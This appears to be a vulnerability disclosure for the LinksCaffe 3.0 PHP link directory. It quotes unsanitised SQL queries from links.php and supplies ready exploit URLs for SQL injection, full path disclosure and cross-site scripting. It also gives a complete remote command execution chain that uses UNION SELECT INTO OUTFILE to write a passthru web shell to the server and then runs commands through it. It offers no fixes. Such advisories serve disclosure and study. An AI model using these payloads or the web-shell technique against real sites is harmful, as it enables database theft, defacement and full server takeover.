LinksCaffe30.txt

`LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilties  
  
Produce : LinksCaffe 3.0  
Website : http://gonafish.com/  
Impact : manupulation of data / system access  
Discovered by : Simo64 - Moroccan Security Team  
  
[+] SQL injection  
******************  
  
[1]Vulnerable code in line 223 in links.php  
  
code :   
  
$rime = mysql_query("SELECT * from links WHERE link_val like 'yes' AND cat_id LIKE '$cat' ORDER BY hits DESC, link_pop DESC, rate DESC LIMIT $offset, $limit") or die(mysql_error());  
  
$offset and $limit vars are not sanitized before to be used to conducte sql injection attacks  
  
Exploit :   
  
http://localhost/linkscaffe/links.php?cat=1&offset=[SQL]  
http://localhost/linkscaffe/links.php?cat=1&limit=[SQL]  
  
[2] Vulnerable code in line 516 in links.php  
  
code :   
  
if (!$newdays)  
{  
$newdays=$daysnew;  
}  
else  
{  
$newdays=$newdays;  
}  
  
$rime1 = mysql_query("SELECT COUNT(*) from links WHERE (to_days(NOW()) - to_days(links.date)) <= $newdays AND link_val = 'yes'") or die(mysql_error());  
  
Exploit :  
http://localhost/linkscaffe/links.php?action=new&newdays=[SQL]  
  
  
[3] Vulnerable code in line 516 in links.php  
  
code :  
  
if ($action=="deadlink")  
{  
........  
$rime = mysql_query("SELECT * from links WHERE link_id=$link_id") or die(mysql_error());  
while($row = mysql_fetch_array($rime)) {  
extract($row);  
echo "<li><font class=text10><a href='$link_url' target='_blank'>$link_name</a><br>$link_desc<br></font></li>";  
echo "<input type = 'hidden' name = 'link_id' value='$link_id'><input type = 'hidden' name = 'cat_id' value='$cat_id'><input type = 'hidden' name = 'link_name' value='$link_name'>  
<input type = 'hidden' name = 'link_url' value='$link_url'><input type = 'hidden' name = 'link_desc' value='$link_desc'><input type = 'hidden' name = 'link_email' value='$link_email'><br><input type = 'submit' value = 'Dead Link'>";  
}  
  
$link_id var are not sanitized before to be used to conducte sql injection attacks  
  
Exploit :  
  
http://localhost/linkscaffe/links.php?action=deadlink&link_id=[SQL]  
  
[+] FullPath disclosure :  
  
PoC :   
  
http://localhost/linkscaffe/links.php?action=new&newdays=-1+UNION+SELECT+123456/*  
  
Result :  
  
Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 540  
  
Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 549  
  
Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 554  
  
[+] Remote Command Execution  
*****************************  
  
if magic_quote_gpc == OFF we can create a shell in writable folder using (3)!!  
  
Exploit :  
  
http://localhost/linkscaffe/links.php?action=deadlink&link_id=-1+UNION+SELECT+0,0,0,0,'<?passthru(\$_GET[\'cmd\']);?>',0,0,0,0,0,0,0,0,0,0%20INTO%20OUTFILE%20'/usr/home/simo64/linkscaffe/pipo.php'/*  
  
after we can exec cmds  
  
http://localhost/linkscaffe/pipo.php?cmd=ls;id  
  
  
  
[+] Cross Site Scripting   
*************************  
  
$tablewidth var in counter.php is not sanitized before to be used to conducte xss attacks  
$newdays var in links.php is not sanitized before to be used to conducte xss attacks  
$tableborder,$menucolor,$textcolor,$bodycolor vars in links.php are not sanitized before to be used to conducte xss attacks  
  
PoC :   
  
http://localhost/linkscaffe/counter.php?tablewidth='%3E[XSS]<p+  
  
http://localhost/linkscaffe/links.php?action=new&newdays=[XSS]  
  
http://localhost/linkscaffe/menu.inc.php?tableborder='%3E[XSS]  
  
http://localhost/linkscaffe/menu.inc.php?menucolor='%3E[XSS]  
  
http://localhost/linkscaffe/menu.inc.php?textcolor='%3E[XSS]  
  
http://localhost/linkscaffe/menu.inc.php?bodycolor='%3E[XSS]  
  
  
  
Contact : [email protected]  
  
greetz to all friends !  
`